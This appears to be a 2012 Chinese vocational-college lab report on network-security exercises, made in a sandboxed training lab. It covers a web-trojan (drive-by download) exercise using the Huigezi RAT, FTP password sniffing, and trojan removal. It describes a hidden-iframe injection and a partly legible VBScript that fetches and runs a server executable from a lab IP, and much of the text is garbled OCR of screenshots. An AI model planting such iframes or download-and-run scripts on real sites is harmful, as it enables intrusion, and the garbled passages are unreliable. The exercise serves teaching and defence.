网络安全基础实训报告

苏州市职业大学实习（实训）报告名称 网络安全基础实训2012年6月20日至2012年6月22日共1周院系 计算机工程系班级10网络安全（CIW）姓 名胡帅帅系主任 李金祥（教研室主任 谭方勇指导教师肖长水方立刚苏州市职业大学]实习（实训）任务书名称： 网络安全基础实训起讫时间：2012年6月20日至6月22日院系： 计算机工程系 班级：10网络安全（CIW）指导教师： 肖长水方立刚）系主任： 李金祥 、实习（实训）目的和要求二、实训说明：本次实训使用信1-510信息安全实训室的“网络信息安全教学实验系统”实训中所涉及主机名和IP地址应该用实训中实际使用的主机名和IP地址代替；根据实训过程，完成实训步骤中所需填写的内容；实训结束，对本次实训过程写一份实训总结。）实训一网页木马【实训目的】剖析网页木马的工作原理理解木马的植入过程学会编写简单的网页木马脚本通过分析监控信息实现手动删除木马【实训人数11每组2人【系统环境】Windows【网络环境】交换网络结构【实训工具】灰鸽子木马监控器工具网络协议分析器【实训原理】见网络信息安全教学实验系统I实验26I练习一。实训二明文嗅探【实训目的】了解明文嗅探能够利用嗅探工具获取邮件账号了解Base64编码应用【实训人数】每组2人【系统环境】Windows【网络环境】》交换网络结构【实训工具】Base64转码器网络协议分析器【实训原理】见网络信息安全教学实验系统I实验21I练习一。实训三Web漏洞扫描器【实训目的】了解漏洞扫描原理设计一个简单Web漏洞扫描器【实训人数】每组1人【系统环境】Windows【网络环境】交换网络结构【实训工具】VC++网络协议分析器【实训原理】见网络信息安全教学实验系统I实验20I练习三实训四Outlook邮件病毒【实训目的】了解邮件型病毒的传播方式了解邮件型病毒的工作原理掌握邮件型病毒的杀毒方法【实训人数】每组2人"【系统环境】Windows【网络环境】交换网络结构【实训工具】MicrosoftOutlook2003MicrosoftWord2003【实训原理】见网络信息安全教学实验系统I实验35I练习一。实训五PGP应用【实训目的】学会利用PGP工具实现安全通信解安全通信实现过程【实训人数】每组2人【系统环境】Windows【网络环境】交换网络结构【实训工具】GnuPG》【实训原理】见网络信息安全教学实验系统I实验9I练习二。实训六Windows2003防火墙应用【实训目的】了解防火墙的含义与作用学习防火墙的基本配置方法【实训人数】每组3人【系统环境】Windows【网络环境】交换网络结构【实训工具】UdpToolsWindowsServer2003系统防火墙-网络协议分析器【实训原理】见网络信息安全教学实验系统I实验27I练习一。二、实习（实训）内容实训一网页木马【实训步骤】＜本练习主机A、B为一组，C、D为一组，E、F为一组。实训角色说明如下:实训主机实训角色主机A、C、E木马控制端（木马客户端）主机B、D、F木马被控端（木马服务器）下面以主机A、B为例，说明实训步骤。首先使用“快照X”恢复Windows系统环境。一.木马生成与植入在进行本实训步骤之前，我们再来阐述一下用户主机通过访问被“挂马”的网站而被植入木马的过程，便于同学们理解和完成实训。（1）用户访问被“挂马”的网站主页。（此网站是安全的）（2）“挂马”网站主页中的＜iframe＞代码链接一个网址（即一个网页木马），使用户主机自动访问网页木马。（通过把＜iframe＞设置成不可见的，使用户无法察觉到这个过程）（3）网页木马在得到用户连接后，自动发送安装程序给用户。~（4）如果用户主机存在MS06014漏洞，则自动下载木马安装程序并在后台运行。

(5)木马安装成功后，木马服务端定时监测控制端是否存在，发现控制端上线后立即弹出端□主动连接控制端打开的被动端口。(6)客户端收到连接请求，建立连接。.生成网页木马(1)主机A首先通过Internet信息服务(IIS)管理器启动“木马网站”。如图1-1所示:右击木马网站，点击“启动”即可。tInternet信息・多(U5)管理察文件(日操作(目查看M盲口(此帮助回牛才|包国|X商用，口四|星|「■描逑|标识符|状意修跋送网站1正在运行招网站19L167S243正在运行44339Z3B2已后工再正常网站(离口622792767已冷_L通钓鱼网站(停11)94444104Z已冷_L图1-1：启动木马网站甲htc-ncl:信息服第—-七比2,式=地计算机;4」FTP玷一占4」应用程序池+」的%」胃北眠箔F展》(2)主机A进入实训平台在工具栏中单击“灰鸽子”按钮运行灰鸽子远程监控木马程序。如图1-2所示：图1-2图1-2：运行灰鸽子远程监控木马程序(3)主机A生成木马的“服务器程序”。主机A单击木马操作界面工具栏“配置服务程序”按钮，弹出“服务器配置”对话框，单击“自动上线设置〃属性页，在“IP通知http访问地址、DNS解析域名或固定IP”文本框中输入本机IP地址，在“保存路径'文本框中输入“D:\Work\IIS\"，单击“生成服务器〃按钮，生成木马“服务器程序”。如图1-3所示：

保存踣径:口：帆工同［£4""_£"9"4口［自勃上畿设置］安保存踣径:口：帆工同［£4""_£"9"4口［自勃上畿设置］安井选项启动项设置代谢员普高如选项捶件功是匚通知i.tpfcJlW地址、口非盖析自名或因Wir；2SJpT?IE.532^2T周i＞配甲f哥器程序成功卜叱分在接密历史自己提示信息%图1-3：生成服务器端程序（4）主机A编写生成网页木马的脚本。在桌面建立一个“”文档，打开“”，将实训原理中网马脚本写入，并将第15行“主机IP地址”替换成主机A的IP地址。把"”文件扩展名改为“.htm”，生成“〃。如图1-4所示：IV，-自建AdMh一叶皿n引司.沪上三用二下IV，-自建AdMh一叶皿n引司.沪上三用二下7茁明小:建方.实现对施的诱、写等操作->Setadlo£-df.createObjt(^iSidocilb=StreansitHiS>adlos.tippe-1<1—使用HTTPGET初如tHTTP请求url-B,http=/7172 .58-232：W?i3/Serwr_Sftup-exe-闺hJpen urlBFalsey一发送HTT喑琳，并联取HTTPil向应->MlhsSend、…I.，-；r；.^si：i-i|ir 专区耳三门系筑EetFs■dF.creat^Ot]ject(Scripting.FileSjj5tenObject1"a1119)仃二汽建川ihttp.-、|身，用主三虫.；［此始包二%"“，，"|泞.内酢讥以亨芯“y」MTMil-Il4-.I：|-|-,|1rflhiri:1C'llii:rir.nrr.^lllHTIP","")文件㈤编镯以格式回 祁蛔Tro］mJT就-理事聿图1-4：编写生成网页木马的脚本「注」C:\ExpNIS\NetAD-Lab\Projects\Trojan\文件提供了VB脚本源码。将生成的””文件保存到七:\^0米\15\"目录下（"D:\Work\IIS\”为“木马网站”的网站空间目录），“”文件就是网页木马程序。如图1-5所示： & I修D:\WQrk\IIS文件（日编辑但查看⑼收藏回工具（D帮助（WQ后退▼G・t|©搜索由文件夹|伟爵XR|㈢’地址⑫|OD:\Work\II5名称- 1 大小1类型 1回时忤门了.9 63MR 口寸守件■&jindej.html 1KB HTMLDocument5erver_5etup.exe 744KB 应月程序■fejthunder.htm 3KB HTMLDocument旦］upFik■，口印 13KD AD「文件■&jxsstestl.html 1KB HTMLDocument■&jxsstest2.html 1KB HTMLDocument题蹦MIMI 2KB HTMLDocument图1-5：保存生成的””文件.完成对默认网站的“挂马”过程（1）主机A进入目录“C:\Inetpub\wwwroot”，使用记事本打开“”文件。（“默认网站”的网站空间目录为“C:\Inetpub\wwwroot\"，主页为“”）（2）对“”进行编辑。在代码的底部加上＜iframe＞语句，具体见实训原理I名词解释Iiframe标签（需将修改为，实现从此网页对网页木马的链接。如图1-6所示：f.indsM.htmlm字本BTialxi文忖旧si密⑹格式⑨astyj糖帧Dsize: line-heiglht:12pt;Fomt-sije-aiaJuist:nciwe;Font--1stretch;normal;cclcr;bl或k’,》蹙访问IIS帮助《开untAW/hS〉<d1> '"IcFontstyle-"fnnt-faBilii:宋体；Font-stylE：norm;fnnt-uariant;no^nnail;Font-则eighteofirmal;font-sizet$pt；lineheight;12pt;Font-size-adljijst;none;font-stretch;normal;CDlor;bldclk;ah><liid=，uIIeH,。单击他》开始《外'然后单击《通运行山加,,UuillRtK》在O打开"n文本框中q耀人<lb>irjetAgr</b>,招出现ns管理器.id="bulled少.<h>帮助"一菜单,单击他》帮助壬题“h九(7-11in-'Wilet¥,)单击小Tint信息服务《油)。5心</tr><ifraraesrc-^http://172=iBa£8,232:909Trojanahtio111nmme-Hjlics^1111ujidlith^ldftfight-tlframpbrarder«B)- -图1-6：对“〃文件进行编辑.木马的植入(1)主机B设置监控。■主机B进入实训平台，单击工具栏“监控器，按钮，打开监控器。如图1-7所示:

图17：主机B打开监控器在向导栏中依次启动“进程监控”、“端口监控”，选择“文件监控”，在菜单栏中选择“选项”I“设置”，在设置界面中设置监视目录久:\^向0川$\"（默认已被添加完成），操作类型全部选中，启动文件监控。如图18启动文件监控。如图18所示:图18:设置监视目录和操作类型启动协议分析器，单击菜单“设置”1“定义过滤器”在弹出的“定义过滤器”对话框中选择“网络地址”选项卡，设置捕获主机A与主机B之间的数据。如图19所示：%

%图1-9：定乂过滤器中的网络地址

新建捕获窗口，点击“选择过滤器”按钮，确定过滤信息。在捕获窗口工具栏中点击“开始捕获数据包”按钮，开始捕获数据包。如图1-10所示:选拜过的褐过滤器附地址过逵地址类型:-Pv4挣苏卡式：空型选拜过的褐过滤器附地址过逵地址类型:-Pv4挣苏卡式：空型172.10.53,231 172.10.50,232图1-10：确定过滤信息主机B启动IE浏览器，访问“主机A的IP地址”。（2）主机A等待“灰鸽子远程控制”程序主界面的“文件管理器”属性页中“文件目录浏览树中出现“自动上线主机”时通知主机B。如图1-11所示：女件!11使置女件!11使置国J工及口）跄8Mk^V9t营密圜学学一国日扇上电！修丽森区解,t营密圜学学一国日扇上电！修丽森区解,Ttlrrtr配餐鞭为世客用小牝ifittiS3会dlX_f4商DD»■L5电后卸工3tED 族强犍!：（SffBrFiTK『'i舌的电畸牧民战天王见CSK?^KCifi-V自掘破'rttt1■aaMTTBtSMi.flXVaHflUiniKESMT.Il”:领）图1-11：主机B上线（3）主机B查看“进程监控”、“服务监控”、“文件监控”和“端口监控”所捕获到的信息。在“进程监控”1“变化视图”中查看是否存在“进程映像名称”为“的新增条目。观察进程监控信息，结合实训原理回答下面的问题。（存在）如图1-12所示：

201Z^-Z016：36：5qIlffiS 364a 1□nd,日用1CAWtFJDO^systBrnlZ^md.eMe I初衣6m1&37口口: |21卫 MoritE4\exeUEKhJ^lr^AD-LaMT口d割EaH让口三0口|11人10日上口~.EHE ZOIZ^-ZD16：<10!4E.工厂NEWiBlFHEreWE匚:正:中所5'iN0tAD』mblT口d丸AndYzaAPJatfinalyMrlNE^rialyzEf.exE：anWY-EOi6:-=IL：29112awniprvte.&xeU；m'『IDCiW^ystend2VxbsnUwrrig总e工日EtllM-Efl16H3:617律场20[EXPLWE.EXECijprnor.amR匕加ntecnet£加口「叫E啦UREEXEaHZT-2016旧3：犷190窿! 「纲整 riricqh.feja白欣:CUMEa4111ACHIMI7LLCCftLS^HWmpMrikqln.weEfllM-203旬9：—[EMPLOYE.DIECi^frag-amFifesyintErnetExplurEJE用LCiRE.EMEZDIZ^-ZD16N3!Z1，燎用.叫「!二庚 LLCaLS-llT日叩】曜11103田EM团饺团16书:22’T室的”Hecker.匚口m.e.i|图1-12：查看进程文件是由哪个进程创建的：C:\WINDOWS\在“服务监控”中单击工具栏中的“刷新”按钮，查看是否存在“服务名称”为WindowsXPVista”的新增条目，观察服务监控信息，回答下面的问题。（存在）如图1-13所示:MTTHJTlk_LWmiXmiAp5rvKUfiLBEfU■xzcsvcWindoms^PiJst...Mndov-hlsTjageiTiEritMTTHJTlk_LWmiXmiAp5rvKUfiLBEfU■xzcsvcWindoms^PiJst...Mndov-hlsTjageiTiErit[ns口..壬在运行WindawsMsriaqefrer^[m...i$_t15Td[REtfCrgT"(l叩ter 停止_AutExnatcUpdates时「谢EQrfkjJr的[m 手在运行Mflt'ErkPrwi曲nngRtt防停止Wndwis^PUstaRft动动a动Rh动

自手手自目手自匚LWlhCOVi1正.CXWINDW叱0U汹枕即晒而一匚:jWJh£iW血rsfcan32Hrd™匕e工…□IW1NDW形设即i32帕时E：..□MdHDOV1gESE宏iFrthcetme.提供共确昴面耐衣但这以便访问有关博性制学上-制恂日成用干登WndoijMSMar^qefrert[ndtrurrent...A忡1型4归可k可±rrdrurrfint^knCWTj15供程…死许下朝并左转V*nd口融更新.如果比U老爸祟用…后用山颂百配血目动肥良：.如枭此国若际…在陆内行自动硝提供营理:州L辱文件.买困于眼雷/程序.历程览甑理;图1-13：查看WindowsXPVista服务WindowsXPvista服务的执行体文件是：；在“文件监控”中查看“文件名”为“C:\WINDOWS也新增条目。如图1-14所示:F[LE_ATTR[E[EIPLORE.EJiE 匚:)UHPJ□匚iW5L£y5tEFn32(mhtml.Z[LE1ATTR[B-jDtPLORE.EME" 一心MWDW5⑶ dlFILEATTREB[EXPLORE.EMEC:^[NDOV5^ystErri32\m5htm.dll=ILE_ArTR[B[EXPLORE.E^E-■\(/TJrj-.W5,^q-ii.VuiiVi-ii.IIHLE_ATTR[B[EKPLORE.EXE科EtmTS3nm冲1cf1RLE_ATTP,[E：[-,■.inlDgri.BKB二「胃二NEC%⑸HWjcwncr.rirleZmcofy同川口口卜帝匕C;W[NDOW5lH.riMZPF[LE_ATTR[BiMnlDgri.BKBC'WTJIJ.W-.,HAr^r.rrnrr.riF1LE_ATTR[BMnlDgri.BKBL:]WCNDDWSlHacker,.riFILE_ATTR[BSystem：;'\<rJD>/：,lladjc-r.ccncr.ri图1-14：查看C:\WINDOWS\在“端口监控”中查看“远程端口”为“8000”的新增条目，观察端口监控信息，回答下面问题：如图1-15所示：ww1连壁状袍1本中地址本地耀口1本地用口名徘1国心眦 1运港跳口历上保□名次进程端导1进在后祢E57ABLBHEDL?Z,L0,M,Z3]J01317E.1B,50.E3E000035&+口LFroq由EFilKUrternetEkd口rer\]…L1诩CzljPragramRles^lriefnetEkplnrer\i...LISTENINGo.n.n.a21 Ftpa.o.o.o■L556LI/NlJJj 111rletsrMmt,..LT5TEMNGO.D.D.O23 tetieta.o.o.o一L&50ULWUJDWS^y浜m3211dLT5TEMN后以。00 Htpa.o.o.o4L40uiwwiow*皆的行定&式卜止3中㈤LI5IEMINGOiD.DiDJ35 azrap□.0.0.0rfa双匚dwiPJDSV电y总2:运匕1/dn史exrLISTENINGQ.D.D.aWHG mnc'scfir-dsa.a.o.o■-1[System]图1-15：查看“远程端口”为“8000”的新增条目8000服务远程地址（控制端）地址：经过对上述监控信息的观察，你认为在“进程监控”中出现的进程（若存在）在整个的木马植入过程中起到的作用是:_迷惑管理员，使安装过程及其留下的痕迹不通过细心查看不易被发觉;（4）主机B查看协议分析器所捕获的信息。注意图1-1中划线部分的数据，结合实际结果找到对应的信息。如图1-16所示：

OpDl9-900Bl293A-2JL£员2965ACIEOpDl9-900Bl293A-2JL£员2965ACIE625』SBOCB6kJ0CFUDDOOOOOUDDO32OO7276657E3739302EiD3129ODoo口口aooooodooo□□00DOOO□□73了胃36qq□orioooon口口00oo口口□□□□DO□□□□□□□□□□□□□□□□□□□□□□□□□□40DO89 2*□£OQ相OU3AE73lC129FA45口13CFIFD6F700OD00OO00OD5T692092303053657216DOCDQQ□□000□000000OD000000OD000000OD0000DOOD00no□000OODO□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□■d->>*Hris.1ij-ii.IW।l日.g।Ml_.Si.P।<iETZTTDjan.4licttiHITPZ1.4Ji.»Accept:u»ge/gbtf皿工旧腓门KD.app1irfliti口n/iwwjTcbappliawfcioEi/'M-H-lLOCJCFaVtt-fImIl,1/1r.Fer«i«ir;116C；P；//17Z,BfLMA32.»jlLC?epT-lrBajguB.QE；utL-^D.rU&-GPUJ?iSS..IcoepT-ETicocLnngigElpPletlaw।i<L5er-Jig«n^=冲421；1雨日-中rG«wp<&itle;H3II&.□;Mln曲rMT 4nIl,,11QBts 16..M.33古;$090..<oTiT>eat：i□n： 3VB..r,) ..Er--I[!,2..：l；*ju-Eu..+3-i.： ■5-00।■।+,C-I-j5-i-<£1.RSS:1；.P・：&・,・P"3犷L・F・&ETJ5utave1G£T¥ItijdbSEp.uxuHTTP^ues/pwercar.Accept•叼gifHTTP/1.1..AC匚fu：xbs--ueRi：rt/*..Reier-incodiHgs「门Jltrf?//17Zr1deflate__Sr-SQ.ZSZr.Acceptgent:Mdci-Lavage：□(ccanpati--^-CPD:xBS..A3I£6fc0;ffcfEcpt-lDEdillng"MTUS031:172-132；gO9O.aC工till：Eteep-S3L，口

6563747665ODqzlprdtClarE..ITser-Agent:Hozzl1h/4-Q(compHtzhIe;H3I£6uO;UindnuBNT562;3V1).uHoat:172»10□56u2:3£।.ConoECtldil;Eeep-11ive»图1-16：协议分析器捕获信息二.木马的功能.文件管理(1)主机B在目录照:做0米\丁阿1四'下建立一个文本文件，并命名为“”如图1-17所示:图1-17：主机B创建“”(2)主机A操作“灰鸽子远程控制”程序来对主机B进行文件管理。[单击“文件管理器”属性页，效仿资源管理器的方法在左侧的树形列表的“自动上线主机”下找到主机B新建的文件“D:\Work\Trojan\"。在右侧的详细列表中对该文件进行重命名操作。如图1-18所示：（3）在主机BD2\V/orik\Troji3n五件目录网is 国□箭自动上俎主杭 ±S9H»tBD目-■C.-D-白口florb国国团场霹搜索融国【咤」原索内号; 自动上坟主机更有名专G发话血功I文韩剑贵■嚎K毕.1T：OO：S3白勺-IQanQpY广Ebfc&町电.&■田总工图1-18：对文件进行重命名操作上观察文件操作的结果。如图1-19所示：文件妇编辘日查若CQ।收枝面工具①帮助时。后国・◎•蕾|Q烈案◎三件夹|防沙M4|图，gj5hui3i5hjai.txt：OK0文本交档2D126-£016:57图1-19：主机B上观察文件操作的结果.系统信息查看单击“远程控制命令”属查看主机B操作系统信息。主机A操作“灰鸽子远程控制”程序查看主机B的操作系统信息。单击“远程控制命令”属查看主机B操作系统信息。性页，选中“系统操作”属性页，单击界面右侧的“系统信息”按钮，如图1-20所示:MI1ST-KTIsr^TiBgOL±-B-MIII：S3:22H♦工曲amniimL^j工目计划机文件（E）世匿&）工具B裕附如餐用计境茂嘉需■工励届Tin^.*VER桂阍爱司:部翻受需薮信息< £,等血辱啜自动上嬲件底屏高 t酬语青 Telnri. 匣*服名程序 珏小牝浪出当节性展-吊嬴而 电店名舟.|H^tii-H 迪接密防：洲驶.阀HUML播信班IIqjIws3在早虹也叫1口3.E喧1＞可£口＞.3虹91E曾JT«okSJCAlTTliDlS\3£WBP前用尸图1-20：查看主机B操作系统信息.进程查看(1)主机A操作“灰鸽子远程控制”程序对主机B启动的进程进行查看。单击“远程控制命令”属性页，选中“进程管理”属性页，单击界面右侧的“查看进程”按钮，查看主机B进程信息。如图1-21所示：图1-21：查看主机B进程信息(2)主机B查看“进程监控”1“进程视图”枚举出的当前系统运行的进程，并和主机A的查看结果相比较。如图1-22所示：图1-22图1-22：查看主机A的进程信息laJrin进昌名彝IEFPC<E53hlanitar.EM-:非工网屿怔1比14_^^00的一：以51面虹口的上流OK8LECH7F8Si'stenterndFtdcsmOML7BW7EOsn™rw115g31*启0751552>即M审5口耽脑536ULWINO口帧*应叫冽』的.MSUffiL306SI6।■磊egan.ee：匚J；MTJDCiiiW%r4t5弭亡后0K3L3HD88sanfcw.ErfeC：i；iJJirC0i1Wi^i^tm32i1MfijrM.«ct0K8L2FJCCH匚mUO0帕什刖rm刈)5设w:，:口0K&LZF+Z5Pvnacthlp^KB Sm।二:旧WarnF4w]拙立巧”.TeN卜eEHIpmswUSL2LB308L：E1NO口后原明邕科加乳国羽。需L2尔Sfl匚L'MTJDCiiiW%国5英如也1■出讨.上证OKSLZKCOJIE日C:i内UJD0WS1下网m3S(5vd>ast,semONSLEBSCCDfl.cjeJCH1C：iwUC0m&■博ETl过115VdTOSt,ExeOJ»LZ?'AaAB册■dlEfcflOE]«&L：M1f£iug国ftanOt\s.-rTh口止4fr丽2MG0riVdtC.AnS-13S2匚l；MT。Ci陋If同5支而wdtJ0M8L33m：=：AS'WLSVC.m]soq匚何ILDCii^ik网em斓SVnSVC.exE0KSLZID3SirfiUrf&nexe-C:(wife05回mwn科nrt5MjnrtnFaor0M=FHB2CCB的求e1776i二4泗INOQW5回nE卸iML律OMFF5B6D00drtsvr-eas1S60□EINO口帕6淳明汨1r『03%日口肝MknlUkd.AA-ii整日匚炉pqtHTiF&liiTM4■皿UHhN■白丁口^卜制比口＞%1白球CiMFFSRDSflErtl[KtUMI山口加国15比而出孰tl&*本注0KFF530D38VMLtu-adeliHpefC:U=TocraTiri»'i11Tliwarp\UMr+s-ElwfpiTTJpgradeHet*i-0江O^r5K5EO।二TWINS□由SeyrtefZ空,卜咐0H口疔国心值।drust.HXBUEINO口帕囱牡琏前口卜攻必9UW50P3I0lOJg匚|；加jd口心回i即日加g..庭CiMFFTFFD俯e:q:4a■廿:班七C：i.WirCOiiWi^xrJMr.DEOKFF1EOKDUMHa-eLbWieM-⑼口匚：l1ProflFErhHvHTMr+s-elookViTlrHreUsE.eKEo^rr-Rcrsso出griE用翎日L：E1NO0*iV5&AE Fmon.口肝小AM晒工小免日期.K52L：E1NOD帕Isrtt附■冽/511MgV5$田羽。用TSAS怙『Mjjtre37BBC.I|FlCMaYiFfei,iH：j.5.D1日口占亡CiMFPIMKSEXPLORE.EXE3aqC：l,ProQrariFfe^ilrterwtE-pk)rerVEXPLOF£.E^EO^F3F3B1B主机主机A单击“注册表编辑器〃属性页，“HKEY_LOCAL_MACHINE\Software\”键下，.注册表管理在左侧树状控件中“远程主机”(主机B)注册表的

创建新的注册表项；对新创建的注册表项进行重命名等修改操作；删除新创建的注册表项，如图1-23所示，创建了新项“rongrong”，主机B查看相应注册表项，如图1-24所示：成功创建了新项“rongrong”。

目前追挂:Hwt6H片前叱一joc*□K|CanedI图1-23：主机A在主机B上创建新项iS-LJG的砒jfr-Ol北C55\由•口Mkcmu加gLJMasterSoft；&£j必；ffi-ClMicrosoftj周口OCBC；hCjCperMAljj-PloperWPPd-GUl：g-LHPcLaver目前追挂:Hwt6H片前叱一joc*□K|Caned!」Perl

jffi-PlPohdas

；；-l1ProQrano&■口叩5

\@OSchlurrtierger

：i-C1Secure

；ffi-ClSystEffl53fetv

：国••口rhrPrrt

：EQjVM/iareiIncD

\ winPcaprananona।irr口i-_|H让t_U5ERq-_|HKF-_riR^FM_L-Cj^J=r.irongrong图1-24：主机B上多了新项“rongrong”rongrong5.Telnet主机A操作“灰鸽子远程控制”程序对主机B进行远程控制操作，单击菜单项中的“Telnet”按钮，打开Telnet窗口，使用“cdc:\"命令进行目录切换，使用“dir”命令显示当前目录内容，如图1-25所示，使用其它命令进行远程控制，如图1-26所示：用systeminfo命令查看主机B的操作系统信息。片鼻端C中的港没有标蛇口 T翻咛于月是B8AL-n]D>：r4E4QT：3,.匚;Vmnn⑻=y=tHii32>c4门c-dCSCS：NirC：'i.的目录0AinOEIEC.BA7UCOK7I&.SYSDcic-inAnt-E皿1£©tti口交Er2ns _Iju-ub2SSProbeLofiwiProgrm--FjlesVDfKlVE：vnpuh-Jb字至

ITE,HE可用宇节图125:用“dir”命令显示当前目录内容C:L^£ys.tM^nfoLyslepixita主ffics田的LI5注*初录方案耒如.・/■;商」入：期间：

瓦细日时商Mostar主ffics田的LI5注*初录方案耒如.・/■;商」入：期间：

瓦细日时商MostarKl'ZTDscEt(RjiVindoTiIj.)5.Z.3790Sor-ndceFdck1NlctD£.oEtCorpcr-atlok歌交服劳福ITidprocssEQirFre4HDST-NEVKServer如03，EntcrprLieEdiiLonEunldJ79D岫二BIOS版超_lYandovE目录:裁境目录-69E：]3-54£>935639^-45q3520：6^-£118：55：-H20天0小时50a41秒VIMirUjIjlc.Wliii'ATeVirtualFlitfanriH0B-^3rdFC安装了L个处理器口[OL]iffiFflnily6Vlad0l23》铀pin&10GbriULUAlut4!^2992I3THL-BDAOMOc'sYnmowsCSVIND0WS\3rrier326.6.制其它命令及控制主机A通过使用。如图127所示：图126:查看主机B的操作系统信息“灰鸽子远程控制”程序的其它功能（例如“捕获屏幕”），对主机B进行控4解I电购ELJ把1rLWS正Ef"T中口rt£r_cufif!EMT_Li8ffi~CjHfr'J-iXfll_NACHTNEi13口l-WPJ?AWR£l自口加QjiKURmj甲T IaQMV5「EH由□HErj.iSK.出口rt£r_cufif!EMT_L.J'FK;一;㈣•:，图1-27：对主机B进行捕获屏幕三.木马的删除;.自动删除主机A通过使用“灰鸽子远程控制”程序卸载木马的“服务器”程序。具体做法：选择上线主机，单击“远程控制命令”属性页，选中“系统操作”属性页，单击界面右侧的“卸载服务端”按钮，卸载木马的“服务器”程序。如图1-28所示:".；,学山,溥战也目武-ISJH丽* 1”".；,学山,溥战也目武-ISJH丽* 1”、1闭置5塔轻序t-ft'!—当；|ifasw口 ：1n-moiES^H；#*rt稹匚 画whii 同W丁结桌；靠越;嗝飞|[»]件包会田注田*山亩的tt-riiEWE.<i«iIKc11sSwtw5.ZCTTW.-Strvlttr*tk13遥闭计地图1-28：主机A卸载木马的“服务器”程序.手动删除(1)主机B启动IE浏览器，单击菜单栏“工具”["Internet选项”，弹出“Internet选项”配置对话框，单击“删除文件”按钮，在弹出的“删除文件”对话框中，选中“删除所有脱机内容”复选框，单击“确定”按钮直到完成。如图1-29所示：

[图1-29：删除所有脱机内容(2)双击“我的电脑”，在浏览器中单击“工具”1”文件夹选项”菜单项，单击“查看”属性页，选中“显示所有文件和文件夹”，并将“隐藏受保护的操作系统文件”复选框置为不选中状态，单击“确定”按钮。如图1-30所示：图1-30：显示受保护的操作系统文件(3)关闭已打开的Web页，启动“Windows任务管理器”。单击“进程”属性页，在“映像名称”中选中所有””进程，单击“结束进程”按钮。如图1-31所示：应用程序醒I应用程序醒I性33|联网I用户I映像名祐 用户名 ICFUl内存■使用一javw«revniprvseeievrnpma白上0IEIPL0FIEIEEt如口IL。见白javw«revniprvseeievrnpma白上0IEIPL0FIEIEEt如口IL。见白0X44H^Lar«r.rriloaLil4xetljitEvr.初gA5Y12E4JC4SySTEM^djnini3tra.tnrL0C肛3EEVTCEUETTORESERVICESVSTTMXdnLn.L£trA.torAdninistritarIdmixd.etrttarsisnwi靠sumsisnwII0000口口0000口口00000000imt】心¥立nzdt{Z7ChjCS7clw正任第管理雪士有kkkkekkkeke^

660624s£06.-.。!=.53的能57331|]囹37!831的E2d警告:我止进程官寻我不希叟发生蝴果』包括敢搪在先加市.喧不携定。在被察止前.进程将好有机会保存耳状态布数据,确实想终止但进程田,匚二甄二:|(4)I删除“C:\Widnoijexplarerj(rsplorrr.rcxe匚二甄二:|(4)I删除“C:\Widnoijexplarerj(rsplorrr.rcxe^Hackar.L.ini用hh心kb三iis&ilog^Jlrrfilns.BAK图invn，k:g回jautccnpdafc日K沔存11%E由KE941693.lcq回UcenOc.loga e :_：ws\文件。如图1-32所示:1KBWindowExplorerC...20C&72SBsffi972KB7+4KE：11KE：363KE：12KE11KE7KB2阳2KE6KB文件册除H&jckdrioncn.it-.IF岳系统立件.如果H除，臣日T.I爵机或里行程序司篌丸.它正常工隹・茶宗凄将它移动到回收站吗t进程甑33IJcPU便用；4%|内存便用；1日①加KJ036664K金r显)图1-31：结束"”进程图1-32：删除“C:\Widnows\文件(5)启动“服务”管理器。选中右侧详细列表中的“WindowsXPVista”条目，单击右键，在弹出菜单中选中“属性”菜单项，在弹出的对话框中，将“启动类型”改为“禁用”单击“确定”按钮。如图1-33所示：

WilnilMPVi>la 的屋性〔本地计隹*1J

图1-33：禁用“WindowsXPVista”服务岸物］曾录［原复依存美乐］理氏岸物］曾录［原复依存美乐］理氏I取消I应用⑥(6)启动注册表编辑器，删除“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WindowsXPVista”节点。如图1-34所示：：向印1as®，声天n帮助岫由krTK'pa *||由Ymcnet由口「即FR口W32TmEFH口W3SUC田|_JWaiarpL3TOKA由匕Vflndmis如Utsta由口附nHttpAg1通V5优由口Mr炉t由口山口或10我叱IJ白恤Trustm1mlWml右肺 荒里叫:打山金|匚匕门轼|[]|"|叫DisplayN日nwErrorCdritralaisl一_-r.-uLHJEG_5ZHEG_SZP£b_5ZPJEGJWCiRDHFfZF^PAF4DA71谢小度■陕2dREG_SZPEGJWORDPEGJWORD£聃安妻，滁这个友和期百耳子夜吗？1香（回—图1-34：删除“WindowsXPVista”节点（7）重新启动计算机。（8）主机A如果还没卸载灰鸽子程序，可打开查看自动上线主机，已经不存在了。如图1-35所示:图1-35：删除上线主机B<实训二明文嗅探【实训步骤】本练习主机A、B为一组，C、D为一组，E、F为一组。下面以主机A、B为例，说明实训步骤。首先使用“快照X”恢复Windows系统环境。一.获取FTP帐户密码FTP协议数据包在传输的时候使用明文传输，我们可以通过对数据包的监听嗅探获得FTP帐户的用户名和密码。确保主机A启动FTP服务使得主机B能够正常登录。.主机A网络嗅探(1)主机A(1)主机A进入实训平台，启动协议分析器。如图2-1所示:单击工具栏”协议分析器”，图2-1：启动协议分析器(2)启动协议分析器，单击菜单“设置”1“定义过滤器”，在“定义过滤器”界面中，选择“网络地址”选项卡，设置捕获本机IP地址与同组主机地址间的数据；选择“协议过滤”选项卡，选中“IP”|“TCP"I“FTPControl”和“FTPData〃节点，单击“确定”按钮完成过滤器设置。单击“新建捕获窗口”按钮，点击“选择过滤器”按钮，确定过滤信息。在新建捕获窗口工具栏中点击”开始捕获数据包”按钮，开始捕获数据包。如图2-2和2-3所示：图2-2:定义过滤器IP地址

定攵过腾密T干用口口回□口□国-LL「定攵过腾密T干用口口回□口□国-LL「A'l脸I取消加雕)…|另定为［目…|<图2-3：定义过滤器协议类型.主机B远程FTP登录(1)主机B通过“命令提示符"FTP登录主机A,操作如下：首先输入：ftp主机A的IP；在出现User后面输入：student；在Password后面输入：123456,操作如图2-4所示：图2-4：FTP登录成功.分析捕获数据包((1)主机B登录主机A成功后，主机A停止协议分析器捕获数据包，并分析会话过程，在“会话分析”页签中，点击会话交互图上的用户名及密码(如图：2-2)即可以看到主机B登陆主机A所使用的用户名和密码。如图2-5所示：

